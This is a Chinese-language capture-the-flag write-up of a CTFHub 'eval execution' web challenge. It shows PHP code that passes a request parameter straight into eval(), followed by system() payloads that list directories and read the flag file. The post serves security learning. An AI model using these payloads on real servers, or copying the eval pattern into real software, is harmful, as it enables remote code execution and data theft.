CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
通信小呆呆16 小时前
当算法有了“五感”:多模态数据融合如何向人体感官协同学习?
人工智能·学习·算法·机器学习·机器人
H__Rick17 小时前
自动对焦学习-3
人工智能·学习·计算机视觉
Daisy Lee17 小时前
量化学习-第1章-什么是量化金融
学习·金融·datawhale
Alsn8618 小时前
等待学习-学习目录:Docker 容器安全攻防
学习·安全·docker
YM52e18 小时前
买菜计算器小应用 - HarmonyOS ArkUI 开发实战-PC版本
学习·华为·harmonyos·鸿蒙·鸿蒙系统
小雨下雨的雨18 小时前
HarmonyOS ArkUI训练营入门-组件掌握系列-Animation 动画效果实现-PC版本
学习·华为·harmonyos·鸿蒙
cqbzcsq19 小时前
CellFlow虚拟细胞论文阅读
论文阅读·人工智能·笔记·学习·生物信息
YangYang9YangYan20 小时前
2026初入职场学习数据分析的价值
学习·数据挖掘·数据分析
guslegend21 小时前
理论学习:什么是 Coding Agent?
学习
自传.21 小时前
尚硅谷 Vibe Coding|第三章(1) Claude Code深度使用与进阶技巧 学习笔记
笔记·学习·尚硅谷·vibecoding
热门推荐
012026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?022026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf03【AI】2026 年具身智能模型和世界模型总结042026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?052026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?06GitHub 镜像站点07AI科技热点日报 | 2026年6月1日08上线仅72小时被强制下架:Claude Fable 5 的短命09HTTP 与 HTTPS 的区别:从原理到实战详解10Codex 下载安装指南:Windows 和 macOS 官方版下载